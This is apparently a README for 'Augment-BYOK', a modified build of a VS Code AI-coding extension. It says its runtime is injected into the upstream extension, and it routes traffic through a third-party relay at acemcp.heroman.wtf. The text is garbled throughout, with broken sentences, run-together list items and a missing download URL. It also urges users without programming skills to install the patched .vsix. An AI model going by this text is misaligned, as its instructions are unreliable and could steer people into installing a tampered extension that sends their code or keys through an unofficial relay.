This guide will help you download and run the Augment-BYOK application. You donβt need programming skills. Just follow these steps.
*.vsix. Click on it to start the download..vsix.Before using the application, ensure you have the following:
*.vsix file you downloaded earlier and select it.If you want to build the VSIX from source, follow these steps:
pnpm install
pnpm build:vsix
dist/ directory. There you will see the generated *.vsix files.The project is organized to make it easy to find files. Here are the main folders:
packages/byok-runtime/src/: This folder contains the BYOK runtime. It is injected into the upstream extension.tools/entry/<capability>/: This folder holds executable scripts for various tasks like building, checking, and testing.tools/mol/vsix-patch-set/: This directory has a set of patches for building.tools/atom/: This folder contains reusable libraries and scripts for building and analyzing.You can download the latest version of augment.vscode-augment from the Marketplace. Use this URL:
For development coordination, use the following relay endpoint:
https://acemcp.heroman.wtf/relay/You can find the configuration files for various relay profiles in the directory:
config/relay-profiles/acemcp-heroman-relay.jsonconfig/byok-routing/llm-endpoints.jsonKeep your installation in sync with the official latest updates. Follow these steps to ensure you are up-to-date:
.vsix files as they become available.What is Augment-BYOK?
Augment-BYOK allows users to customize Visual Studio Code extensions by applying patches and tools easily.
Do I need programming knowledge to use this?
No, this guide is designed for all users, regardless of technical skills.
What should I do if I encounter issues?
Check the Issues section on the GitHub repository for common problems or ask for help there.
For further questions, use the same Releases page to find relevant discussions and updates.
If you wish to contribute, feel free to fork the repository and submit pull requests. Your help will make this project better for everyone.
Thank you for trying out Augment-BYOK!